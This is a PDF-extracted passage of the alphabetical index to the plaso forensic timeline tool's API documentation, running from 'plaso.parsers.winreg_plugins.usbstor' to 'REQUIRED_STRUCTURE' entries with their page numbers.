module, 320plaso.parsers.winreg_plugins.usbstor

module, 321plaso.parsers.winreg_plugins.userassist

module, 323plaso.parsers.winreg_plugins.windows_version

module, 324plaso.parsers.winreg_plugins.winlogon

module, 325plaso.parsers.winreg_plugins.winrar

module, 326plaso.parsers.winrestore

module, 432plaso.parsers.xchatlog

module, 433plaso.parsers.xchatscrollback

Index 579


module, 435plaso.parsers.zsh_extended_history

module, 436plaso.preprocessors

module, 444plaso.preprocessors.interface

module, 437plaso.preprocessors.linux

module, 439plaso.preprocessors.logger

module, 440plaso.preprocessors.macos

module, 440plaso.preprocessors.manager

module, 440plaso.preprocessors.windows

module, 442plaso.serializer

module, 445plaso.serializer.interface

module, 444plaso.serializer.json_serializer

module, 445plaso.serializer.logger

module, 445plaso.storage

module, 490plaso.storage.event_heaps

module, 466plaso.storage.event_tag_index

module, 467plaso.storage.factory

module, 468plaso.storage.fake

module, 452plaso.storage.fake.writer

module, 446plaso.storage.file_interface

module, 469plaso.storage.identifiers

module, 478plaso.storage.interface

module, 479plaso.storage.logger

module, 490plaso.storage.redis

module, 462plaso.storage.redis.merge_reader

module, 452plaso.storage.redis.reader

module, 452plaso.storage.redis.redis_store

module, 455plaso.storage.redis.writer

module, 457plaso.storage.sqlite

module, 466plaso.storage.sqlite.merge_reader

module, 462plaso.storage.sqlite.reader

module, 462plaso.storage.sqlite.sqlite_file

module, 462plaso.storage.sqlite.writer

module, 465plaso.storage.time_range

module, 490plaso.unix

module, 490plaso.winnt

module, 491plaso.winnt.known_folder_ids

module, 490plaso.winnt.language_ids

module, 491plaso.winnt.shell_folder_ids

module, 491plaso.winnt.time_zones

module, 491play_count (plaso.parsers.sqlite_plugins.kodi.KodiVideoEventData

attribute), 272PLIST_KEY (plaso.parsers.plist_plugins.interface.PlistPlugin

attribute), 243PLIST_KEYS (plaso.parsers.plist_plugins.airport.AirportPlugin

attribute), 239PLIST_KEYS (plaso.parsers.plist_plugins.appleaccount.AppleAccountPlugin

attribute), 239PLIST_KEYS (plaso.parsers.plist_plugins.bluetooth.BluetoothPlugin

attribute), 240PLIST_KEYS (plaso.parsers.plist_plugins.install_history.InstallHistoryPlugin

attribute), 242PLIST_KEYS (plaso.parsers.plist_plugins.interface.PlistPlugin

attribute), 244PLIST_KEYS (plaso.parsers.plist_plugins.ipod.IPodPlugin

attribute), 245PLIST_KEYS (plaso.parsers.plist_plugins.launchd.LaunchdPlugin

attribute), 245PLIST_KEYS (plaso.parsers.plist_plugins.macuser.MacUserPlugin

attribute), 246PLIST_KEYS (plaso.parsers.plist_plugins.safari.SafariHistoryPlugin

attribute), 247PLIST_KEYS (plaso.parsers.plist_plugins.softwareupdate.SoftwareUpdatePlugin

attribute), 247PLIST_KEYS (plaso.parsers.plist_plugins.spotlight.SpotlightPlugin

attribute), 248PLIST_KEYS (plaso.parsers.plist_plugins.spotlight_volume.SpotlightVolumePlugin

attribute), 248

580 Index


PLIST_KEYS (plaso.parsers.plist_plugins.timemachine.TimeMachinePluginattribute), 249

PLIST_PATH_FILTERS(plaso.parsers.plist_plugins.airport.AirportPluginattribute), 239

PLIST_PATH_FILTERS(plaso.parsers.plist_plugins.appleaccount.AppleAccountPluginattribute), 239

PLIST_PATH_FILTERS(plaso.parsers.plist_plugins.bluetooth.BluetoothPluginattribute), 240

PLIST_PATH_FILTERS(plaso.parsers.plist_plugins.install_history.InstallHistoryPluginattribute), 242

PLIST_PATH_FILTERS(plaso.parsers.plist_plugins.interface.PlistPluginattribute), 243, 244

PLIST_PATH_FILTERS(plaso.parsers.plist_plugins.ipod.IPodPluginattribute), 245

PLIST_PATH_FILTERS(plaso.parsers.plist_plugins.safari.SafariHistoryPluginattribute), 247

PLIST_PATH_FILTERS(plaso.parsers.plist_plugins.softwareupdate.SoftwareUpdatePluginattribute), 248

PLIST_PATH_FILTERS(plaso.parsers.plist_plugins.spotlight.SpotlightPluginattribute), 248

PLIST_PATH_FILTERS(plaso.parsers.plist_plugins.spotlight_volume.SpotlightVolumePluginattribute), 249

PLIST_PATH_FILTERS(plaso.parsers.plist_plugins.timemachine.TimeMachinePluginattribute), 249

PlistFile (class in plaso.lib.plist), 188PlistFileArtifactPreprocessorPlugin

(class in plaso.preprocessors.macos), 440PlistParser (class in plaso.parsers.plist), 383PlistPathFilter (class in

plaso.parsers.plist_plugins.interface), 242PlistPlugin (class in

plaso.parsers.plist_plugins.interface), 243PlistTimeEventData (class in

plaso.containers.plist_event), 108PlsRecallEventData (class in

plaso.parsers.pls_recall), 383PlsRecallParser (class in plaso.parsers.pls_recall),

384plugin_name (plaso.containers.reports.AnalysisReport

attribute), 109plugin_name() (plaso.analysis.interface.AnalysisPlugin

property), 45plugin_name() (plaso.parsers.plugins.BasePlugin

property), 385policy_identifier

(plaso.parsers.trendmicroav.TrendMicroUrlEventDataattribute), 419

PopAttributeContainer()(plaso.storage.file_interface.SerializedAttributeContainerListmethod), 469

PopEvent() (plaso.multi_processing.psort.PsortEventHeapmethod), 193

PopEvent() (plaso.storage.event_heaps.EventHeapmethod), 466

PopEvent() (plaso.storage.event_heaps.SerializedEventHeapmethod), 467

PopEvents() (plaso.multi_processing.psort.PsortEventHeapmethod), 193

PopEvents() (plaso.storage.event_heaps.EventHeapmethod), 466

PopFromParserChain()(plaso.parsers.mediator.ParserMediatormethod), 371

PopItem() (plaso.engine.plaso_queue.Queue method),135

PopItem() (plaso.engine.zeromq_queue.ZeroMQBufferedReplyQueuemethod), 147

PopItem() (plaso.engine.zeromq_queue.ZeroMQPullQueuemethod), 148

PopItem() (plaso.engine.zeromq_queue.ZeroMQPushQueuemethod), 149

PopItem() (plaso.engine.zeromq_queue.ZeroMQQueuemethod), 150

PopItem() (plaso.engine.zeromq_queue.ZeroMQRequestQueuemethod), 151

popularity_index (plaso.parsers.opera.OperaGlobalHistoryEventDataattribute), 380

PopularityContestEventData (class inplaso.parsers.popcontest), 387

PopularityContestParser (class inplaso.parsers.popcontest), 387

PopularityContestSessionEventData (classin plaso.parsers.popcontest), 388

port (plaso.engine.zeromq_queue.ZeroMQQueue at-tribute), 150

PORT (plaso.parsers.iis.WinIISParser attribute), 354port (plaso.parsers.syslog_plugins.ssh.SSHEventData

attribute), 295port_number (plaso.parsers.apache_access.ApacheAccessEventData

attribute), 330ppid (plaso.parsers.santa.SantaExecutionEventData at-

tribute), 392ppid (plaso.parsers.santa.SantaFileSystemEventData

attribute), 393preferred_encoding (plaso.cli.tools.CLITool at-

tribute), 93preferred_encoding

Index 581


(plaso.containers.sessions.Session attribute),111

preferred_encoding(plaso.containers.sessions.SessionConfigurationattribute), 113

preferred_time_zone(plaso.containers.sessions.Session attribute),111

preferred_time_zone(plaso.containers.sessions.SessionConfigurationattribute), 113

preferred_year (plaso.containers.sessions.Sessionattribute), 111

preferred_year (plaso.containers.sessions.SessionConfigurationattribute), 113

preferred_year (plaso.engine.configurations.ProcessingConfigurationattribute), 123

prefetch_hash (plaso.parsers.winprefetch.WinPrefetchExecutionEventDataattribute), 431

PrefixPlistPathFilter (class inplaso.parsers.plist_plugins.interface), 244

PrepareMergeTaskStorage()(plaso.storage.fake.writer.FakeStorageWritermethod), 450

PrepareMergeTaskStorage()(plaso.storage.file_interface.StorageFileWritermethod), 476

PrepareMergeTaskStorage()(plaso.storage.interface.StorageWritermethod), 489

PrepareMergeTaskStorage()(plaso.storage.redis.writer.RedisStorageWritermethod), 460

PreProcessFail, 185PreprocessPluginsManager (class in

plaso.preprocessors.manager), 440PreprocessSources()

(plaso.engine.engine.BaseEngine method),126

presented (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventDataattribute), 276

primary_url (plaso.parsers.chrome_preferences.ChromeContentSettingsExceptionsEventDataattribute), 339

Print() (plaso.filters.file_entry.DateTimeFileEntryFiltermethod), 157

Print() (plaso.filters.file_entry.ExtensionsFileEntryFiltermethod), 157

Print() (plaso.filters.file_entry.FileEntryFiltermethod), 157

Print() (plaso.filters.file_entry.FileEntryFilterCollectionmethod), 158

Print() (plaso.filters.file_entry.NamesFileEntryFiltermethod), 158

Print() (plaso.filters.file_entry.SignaturesFileEntryFilter

method), 158printer_id (plaso.parsers.cups_ipp.CupsIppEventData

attribute), 341PrintExtractionStatusHeader()

(plaso.cli.status_view.StatusView method),91

PrintExtractionSummary()(plaso.cli.status_view.StatusView method),91

PrintFilterCollection()(plaso.cli.image_export_tool.ImageExportToolmethod), 85

PrintSeparatorLine() (plaso.cli.tools.CLIToolmethod), 95

PrintStorageInformation()(plaso.cli.pinfo_tool.PinfoTool method),87

priority (plaso.parsers.google_logging.GoogleLogEventDataattribute), 353

process (plaso.parsers.santa.SantaFileSystemEventDataattribute), 393

Process() (plaso.parsers.bencode_plugins.interface.BencodePluginmethod), 215

Process() (plaso.parsers.bencode_plugins.transmission.TransmissionPluginmethod), 216

Process() (plaso.parsers.bencode_plugins.utorrent.UTorrentPluginmethod), 217

Process() (plaso.parsers.cookie_plugins.interface.BaseCookiePluginmethod), 221

Process() (plaso.parsers.czip_plugins.interface.CompoundZIPPluginmethod), 222

Process() (plaso.parsers.esedb_plugins.interface.ESEDBPluginmethod), 226

Process() (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsOLECFPluginmethod), 235

Process() (plaso.parsers.olecf_plugins.default.DefaultOLECFPluginmethod), 235

Process() (plaso.parsers.olecf_plugins.dtfabric_plugin.DtFabricBaseOLECFPluginmethod), 236

Process() (plaso.parsers.olecf_plugins.interface.OLECFPluginmethod), 237

Process() (plaso.parsers.olecf_plugins.summary.DocumentSummaryInformationOLECFPluginmethod), 237

Process() (plaso.parsers.olecf_plugins.summary.SummaryInformationOLECFPluginmethod), 238

Process() (plaso.parsers.plist_plugins.interface.PlistPluginmethod), 244

Process() (plaso.parsers.plugins.BasePluginmethod), 385

Process() (plaso.parsers.sqlite_plugins.interface.SQLitePluginmethod), 270

Process() (plaso.parsers.syslog_plugins.interface.SyslogPluginmethod), 294

Process() (plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

582 Index


method), 303process_archives (plaso.engine.configurations.ExtractionConfiguration

attribute), 122process_arguments

(plaso.parsers.santa.SantaExecutionEventDataattribute), 393

process_compressed_streams(plaso.engine.configurations.ExtractionConfigurationattribute), 122

process_hash (plaso.parsers.santa.SantaExecutionEventDataattribute), 392

process_name (plaso.parsers.mac_appfirewall.MacAppFirewallLogEventDataattribute), 358

process_path (plaso.parsers.santa.SantaExecutionEventDataattribute), 393

process_path (plaso.parsers.santa.SantaFileSystemEventDataattribute), 394

ProcessEventData()(plaso.parsers.mediator.ParserMediatormethod), 371

ProcessInfo (class in plaso.engine.process_info), 135processing_status

(plaso.engine.worker.EventExtractionWorkerattribute), 145

PROCESSING_STATUS_HINT(plaso.analyzers.hashing_analyzer.HashingAnalyzerattribute), 59

PROCESSING_STATUS_HINT(plaso.analyzers.interface.BaseAnalyzerattribute), 59

PROCESSING_STATUS_HINT(plaso.analyzers.yara_analyzer.YaraAnalyzerattribute), 61

ProcessingConfiguration (class inplaso.engine.configurations), 122

ProcessingProfiler (class inplaso.engine.profilers), 143

ProcessingStatus (class inplaso.engine.processing_status), 139

ProcessPathSpec()(plaso.engine.worker.EventExtractionWorkermethod), 145

ProcessResourcesArgumentsHelper (class inplaso.cli.helpers.process_resources), 73

ProcessSources() (plaso.cli.image_export_tool.ImageExportToolmethod), 85

ProcessSources() (plaso.engine.single_process.SingleProcessEnginemethod), 144

ProcessSources() (plaso.multi_processing.task_engine.TaskMultiProcessEnginemethod), 196

ProcessStatus (class inplaso.engine.processing_status), 136

ProcessStorage() (plaso.cli.psort_tool.PsortToolmethod), 89

ProduceAnalysisReport()(plaso.analysis.mediator.AnalysisMediatormethod), 47

ProduceEventDataStream()(plaso.parsers.mediator.ParserMediatormethod), 372

ProduceEventSource()(plaso.parsers.mediator.ParserMediatormethod), 372

ProduceEventTag()(plaso.analysis.mediator.AnalysisMediatormethod), 47

ProduceEventWithEventData()(plaso.parsers.mediator.ParserMediatormethod), 372

ProduceExtractionWarning()(plaso.parsers.mediator.ParserMediatormethod), 372

product (plaso.containers.artifacts.OperatingSystemArtifactattribute), 99

product (plaso.parsers.winreg_plugins.usb.WindowsUSBDeviceEventDataattribute), 321

product (plaso.parsers.winreg_plugins.usbstor.USBStorEventDataattribute), 322

product_code (plaso.parsers.amcache.AMCacheProgramEventDataattribute), 328

product_name (plaso.containers.sessions.Session at-tribute), 111

product_name (plaso.containers.sessions.SessionStartattribute), 114

product_name (plaso.parsers.amcache.AMCacheFileEventDataattribute), 327

product_name (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventDataattribute), 324

product_version (plaso.containers.sessions.Sessionattribute), 111

product_version (plaso.containers.sessions.SessionStartattribute), 114

profile_url (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventDataattribute), 289

profilers (plaso.engine.configurations.ProfilingConfigurationattribute), 123

PROFILERS_INFORMATION(plaso.cli.helpers.profiling.ProfilingArgumentsHelperattribute), 74

profiling (plaso.engine.configurations.ProcessingConfigurationattribute), 123

ProfilingArgumentsHelper (class inplaso.cli.helpers.profiling), 74

ProfilingConfiguration (class inplaso.engine.configurations), 123

ProfilingOptions (class in plaso.cli.tool_options),93

program_identifier

Index 583


(plaso.parsers.amcache.AMCacheFileEventDataattribute), 327

prompt_count (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntryattribute), 279

property_type (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataAttributeattribute), 402

protocol (plaso.parsers.mac_keychain.KeychainInternetRecordEventDataattribute), 361

protocol (plaso.parsers.syslog_plugins.ssh.SSHEventDataattribute), 295

protocol (plaso.parsers.winfirewall.WinFirewallEventDataattribute), 426

PsortEventHeap (class inplaso.multi_processing.psort), 193

PsortMultiProcessEngine (class inplaso.multi_processing.psort), 194

PsortTool (class in plaso.cli.psort_tool), 88PstealTool (class in plaso.cli.psteal_tool), 89publisher (plaso.parsers.amcache.AMCacheProgramEventData

attribute), 328PushAttributeContainer()

(plaso.storage.file_interface.SerializedAttributeContainerListmethod), 469

PushEvent() (plaso.multi_processing.psort.PsortEventHeapmethod), 193

PushEvent() (plaso.storage.event_heaps.EventHeapmethod), 466

PushEvent() (plaso.storage.event_heaps.SerializedEventHeapmethod), 467

PushItem() (plaso.engine.plaso_queue.Queuemethod), 135

PushItem() (plaso.engine.zeromq_queue.ZeroMQBufferedReplyQueuemethod), 147

PushItem() (plaso.engine.zeromq_queue.ZeroMQPullQueuemethod), 148

PushItem() (plaso.engine.zeromq_queue.ZeroMQPushQueuemethod), 149

PushItem() (plaso.engine.zeromq_queue.ZeroMQQueuemethod), 151

PushItem() (plaso.engine.zeromq_queue.ZeroMQRequestQueuemethod), 152

PyParseIntCast() (in moduleplaso.parsers.text_parser), 414

PyparsingConstants (class inplaso.parsers.text_parser), 414

PyparsingMultiLineTextParser (class inplaso.parsers.text_parser), 415

PyparsingSingleLineTextParser (class inplaso.parsers.text_parser), 416

Qquarfwd_status (plaso.parsers.symantec.SymantecEventData

attribute), 409

QUERIES (plaso.parsers.sqlite_plugins.android_calls.AndroidCallPluginattribute), 251

QUERIES (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPluginattribute), 252

QUERIES (plaso.parsers.sqlite_plugins.android_webview.WebViewPluginattribute), 253

QUERIES (plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCachePluginattribute), 254

QUERIES (plaso.parsers.sqlite_plugins.appusage.ApplicationUsagePluginattribute), 254

QUERIES (plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillPluginattribute), 255

QUERIES (plaso.parsers.sqlite_plugins.chrome_cookies.Chrome17CookiePluginattribute), 256

QUERIES (plaso.parsers.sqlite_plugins.chrome_cookies.Chrome66CookiePluginattribute), 256

QUERIES (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityPluginattribute), 258

QUERIES (plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome27HistoryPluginattribute), 260

QUERIES (plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome8HistoryPluginattribute), 260

QUERIES (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookiePluginattribute), 261

QUERIES (plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadsPluginattribute), 263

QUERIES (plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPluginattribute), 264

QUERIES (plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePluginattribute), 267

QUERIES (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessagePluginattribute), 268

QUERIES (plaso.parsers.sqlite_plugins.imessage.IMessagePluginattribute), 270

QUERIES (plaso.parsers.sqlite_plugins.interface.SQLitePluginattribute), 270

QUERIES (plaso.parsers.sqlite_plugins.kik_ios.KikIOSPluginattribute), 271

QUERIES (plaso.parsers.sqlite_plugins.kodi.KodiMyVideosPluginattribute), 272

QUERIES (plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantinePluginattribute), 273

QUERIES (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPluginattribute), 274

QUERIES (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCPluginattribute), 275

QUERIES (plaso.parsers.sqlite_plugins.mac_notes.MacNotesPluginattribute), 276

QUERIES (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterPluginattribute), 277

QUERIES (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCachePluginattribute), 278

QUERIES (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCPluginattribute), 279

584 Index


QUERIES (plaso.parsers.sqlite_plugins.safari.SafariHistoryPluginSqliteattribute), 280

QUERIES (plaso.parsers.sqlite_plugins.skype.SkypePluginattribute), 283

QUERIES (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidProfilePluginattribute), 285

QUERIES (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPluginattribute), 286

QUERIES (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPluginattribute), 288

QUERIES (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPluginattribute), 290

QUERIES (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelinePluginattribute), 292

QUERIES (plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityDatabasePluginattribute), 293

query (plaso.containers.events.EventData attribute),103

QUERY (plaso.parsers.iis.WinIISParser attribute), 354query (plaso.parsers.pls_recall.PlsRecallEventData at-

tribute), 383Query() (plaso.parsers.sqlite.SQLiteDatabase

method), 405QUERY_DEST_FROM_TRANSFER

(plaso.parsers.sqlite_plugins.skype.SkypePluginattribute), 283

QUERY_SOURCE_FROM_TRANSFER(plaso.parsers.sqlite_plugins.skype.SkypePluginattribute), 283

Queue (class in plaso.engine.plaso_queue), 134QueueAbort (class in plaso.engine.plaso_queue), 135QueueAlreadyClosed, 185QueueAlreadyStarted, 185QueueClose, 185QueueEmpty, 185QueueFull, 185QUOTE_CHAR (plaso.parsers.dsv_parser.DSVParser at-

tribute), 346

Rrankings_node (plaso.parsers.chrome_cache.CacheEntry

attribute), 337Read() (plaso.cli.tools.CLIInputReader method), 93Read() (plaso.cli.tools.FileObjectInputReader method),

95Read() (plaso.cli.tools.StdinInputReader method), 95Read() (plaso.lib.plist.PlistFile method), 188read_gid (plaso.parsers.asl.ASLEventData attribute),

333read_receipt (plaso.parsers.sqlite_plugins.imessage.IMessageEventData

attribute), 269read_uid (plaso.parsers.asl.ASLEventData attribute),

333

ReadFormattersFromDirectory()(plaso.formatters.manager.FormattersManagerclass method), 174

ReadFormattersFromFile()(plaso.formatters.manager.FormattersManagerclass method), 174

ReadFromFile() (plaso.engine.filter_file.FilterFilemethod), 127

ReadFromFile() (plaso.engine.yaml_filter_file.YAMLFilterFilemethod), 146

ReadFromFile() (plaso.formatters.yaml_formatters_file.YAMLFormattersFilemethod), 183

ReadFromFile() (plaso.parsers.presets.ParserPresetsManagermethod), 389

readline() (plaso.lib.line_reader_file.BinaryLineReadermethod), 187

ReadLine() (plaso.parsers.text_parser.EncodedTextReadermethod), 414

readlines() (plaso.lib.line_reader_file.BinaryLineReadermethod), 187

ReadLines() (plaso.parsers.text_parser.EncodedTextReadermethod), 414

ReadSerialized() (plaso.serializer.interface.AttributeContainerSerializermethod), 444

ReadSerialized() (plaso.serializer.json_serializer.JSONAttributeContainerSerializerclass method), 445

ReadSerializedDict()(plaso.serializer.json_serializer.JSONAttributeContainerSerializerclass method), 445

ReadSystemConfiguration()(plaso.storage.file_interface.StorageFileReadermethod), 472

ReadSystemConfiguration()(plaso.storage.interface.BaseStore method),483

ReadSystemConfiguration()(plaso.storage.interface.StorageReadermethod), 486

ReadSystemConfiguration()(plaso.storage.redis.reader.RedisStorageReadermethod), 454

ReadSystemConfiguration()(plaso.storage.redis.writer.RedisStorageWritermethod), 460

ReadSystemConfigurationArtifact()(plaso.engine.knowledge_base.KnowledgeBasemethod), 130

reason (plaso.parsers.santa.SantaExecutionEventDataattribute), 392

received_bytes (plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryFileDownloadedEventDataattribute), 259

received_bytes (plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadEventDataattribute), 262

record_id (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCacheEventData

Index 585


attribute), 277record_index (plaso.parsers.recycler.WinRecycleBinEventData

attribute), 390record_length (plaso.parsers.bsm.BSMEventData

attribute), 335record_number (plaso.parsers.winevt.WinEvtRecordEventData

attribute), 424record_number (plaso.parsers.winevtx.WinEvtxRecordEventData

attribute), 425record_position (plaso.parsers.asl.ASLEventData

attribute), 333record_tag (plaso.parsers.popcontest.PopularityContestEventData

attribute), 387records (plaso.parsers.mac_keychain.KeychainDatabaseTable

attribute), 360recovered (plaso.parsers.msiecf.MSIECFLeakEventData

attribute), 374recovered (plaso.parsers.msiecf.MSIECFRedirectedEventData

attribute), 375recovered (plaso.parsers.msiecf.MSIECFURLEventData

attribute), 376recovered (plaso.parsers.winevt.WinEvtRecordEventData

attribute), 424recovered (plaso.parsers.winevtx.WinEvtxRecordEventData

attribute), 425redirect_url (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData

attribute), 227RedisKeyIdentifier (class in

plaso.storage.identifiers), 478RedisMergeReader (class in

plaso.storage.redis.merge_reader), 452RedisStorageReader (class in

plaso.storage.redis.reader), 452RedisStorageWriter (class in

plaso.storage.redis.writer), 457RedisStore (class in plaso.storage.redis.redis_store),

455referrer (plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadEventData

attribute), 262Regexp (class in plaso.filters.filters), 162RegexpInsensitive (class in plaso.filters.filters),

162RegisterAnalyzer()

(plaso.analyzers.manager.AnalyzersManagerclass method), 61

RegisterAttributeContainer()(plaso.containers.manager.AttributeContainersManagerclass method), 108

RegisterAttributeContainers()(plaso.containers.manager.AttributeContainersManagerclass method), 108

RegisterFormatter()(plaso.formatters.manager.FormattersManagerclass method), 174

RegisterFormatters()(plaso.formatters.manager.FormattersManagerclass method), 174

RegisterHasher() (plaso.analyzers.hashers.manager.HashersManagerclass method), 56

RegisterHelper() (plaso.cli.helpers.manager.ArgumentHelperManagerclass method), 71

RegisterHelpers()(plaso.cli.helpers.manager.ArgumentHelperManagerclass method), 71

RegisterOutput() (plaso.output.manager.OutputManagerclass method), 206

RegisterOutputs()(plaso.output.manager.OutputManager classmethod), 206

RegisterParser() (plaso.parsers.manager.ParsersManagerclass method), 368

RegisterParsers()(plaso.parsers.manager.ParsersManagerclass method), 368

RegisterPlugin() (plaso.analysis.manager.AnalysisPluginManagerclass method), 46

RegisterPlugin() (plaso.parsers.cookie_plugins.manager.CookiePluginsManagerclass method), 221

RegisterPlugin() (plaso.parsers.interface.BaseParserclass method), 356

RegisterPlugin() (plaso.preprocessors.manager.PreprocessPluginsManagerclass method), 441

RegisterPlugins()(plaso.analysis.manager.AnalysisPluginManagerclass method), 46

RegisterPlugins()(plaso.parsers.cookie_plugins.manager.CookiePluginsManagerclass method), 221

RegisterPlugins()(plaso.parsers.interface.BaseParser classmethod), 356

RegisterPlugins()(plaso.preprocessors.manager.PreprocessPluginsManagerclass method), 441

registry_artifact_names(plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelperattribute), 120

registry_find_specs(plaso.engine.filters_helper.CollectionFiltersHelperattribute), 128

relation_identifier(plaso.parsers.mac_keychain.KeychainDatabaseTableattribute), 360

relation_name (plaso.parsers.mac_keychain.KeychainDatabaseTableattribute), 360

relative_path (plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 430

remote_machine (plaso.parsers.symantec.SymantecEventData

586 Index


attribute), 410remote_machine_ip

(plaso.parsers.symantec.SymantecEventDataattribute), 410

remote_name (plaso.parsers.apache_access.ApacheAccessEventDataattribute), 330

Remove() (plaso.storage.redis.redis_store.RedisStoremethod), 456

RemoveAttributeContainer()(plaso.storage.redis.redis_store.RedisStoremethod), 456

RemoveAttributeContainers()(plaso.storage.redis.redis_store.RedisStoremethod), 456

RemoveEventAttribute()(plaso.parsers.mediator.ParserMediatormethod), 372

RemoveProcessedTaskStorage()(plaso.storage.fake.writer.FakeStorageWritermethod), 450

RemoveProcessedTaskStorage()(plaso.storage.file_interface.StorageFileWritermethod), 476

RemoveProcessedTaskStorage()(plaso.storage.interface.StorageWritermethod), 489

RemoveProcessedTaskStorage()(plaso.storage.redis.writer.RedisStorageWritermethod), 460

RemoveTask() (plaso.multi_processing.task_manager.TaskManagermethod), 198

REPEATED_LINE (plaso.parsers.mac_appfirewall.MacAppFirewallParserattribute), 359

REPEATED_LINE (plaso.parsers.mac_securityd.MacOSSecuritydLogParserattribute), 363

report_array (plaso.containers.reports.AnalysisReportattribute), 109

report_dict (plaso.containers.reports.AnalysisReportattribute), 109

reporter (plaso.parsers.syslog.SyslogLineEventDataattribute), 412

REPORTER (plaso.parsers.syslog_plugins.cron.CronSyslogPluginattribute), 294

REPORTER (plaso.parsers.syslog_plugins.interface.SyslogPluginattribute), 295

REPORTER (plaso.parsers.syslog_plugins.ssh.SSHSyslogPluginattribute), 296

reporter (plaso.parsers.systemd_journal.SystemdJournalEventDataattribute), 413

reporting_app (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineUserEngagedEventDataattribute), 292

request_headers (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 227

request_method (plaso.parsers.firefox_cache.FirefoxCacheEventData

attribute), 349request_size (plaso.parsers.firefox_cache.FirefoxCacheEventData

attribute), 349requester (plaso.parsers.apt_history.APTHistoryLogEventData

attribute), 331REQUIRED_ITEMS (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsOLECFPlugin

attribute), 235REQUIRED_ITEMS (plaso.parsers.olecf_plugins.interface.OLECFPlugin

attribute), 237REQUIRED_ITEMS (plaso.parsers.olecf_plugins.summary.DocumentSummaryInformationOLECFPlugin

attribute), 237REQUIRED_ITEMS (plaso.parsers.olecf_plugins.summary.SummaryInformationOLECFPlugin

attribute), 238REQUIRED_KEYS (plaso.parsers.chrome_preferences.ChromePreferencesParser

attribute), 340REQUIRED_PATHS (plaso.parsers.czip_plugins.interface.CompoundZIPPlugin

attribute), 223REQUIRED_PATHS (plaso.parsers.czip_plugins.oxml.OpenXMLPlugin

attribute), 225REQUIRED_STRUCTURE

(plaso.parsers.sqlite_plugins.android_calls.AndroidCallPluginattribute), 251

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPluginattribute), 252

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.android_webview.WebViewPluginattribute), 253

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCachePluginattribute), 254

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.appusage.ApplicationUsagePluginattribute), 254

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillPluginattribute), 255

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.chrome_cookies.Chrome17CookiePluginattribute), 256

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.chrome_cookies.Chrome66CookiePluginattribute), 256

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityPluginattribute), 258

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome27HistoryPluginattribute), 260

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome8HistoryPluginattribute), 260

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookiePlugin

Index 587



(plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadsPluginattribute), 263

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPluginattribute), 264

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePluginattribute), 267

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessagePluginattribute), 269

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.imessage.IMessagePluginattribute), 270

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.interface.SQLitePluginattribute), 270

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.kik_ios.KikIOSPluginattribute), 271

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.kodi.KodiMyVideosPluginattribute), 272

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantinePluginattribute), 273

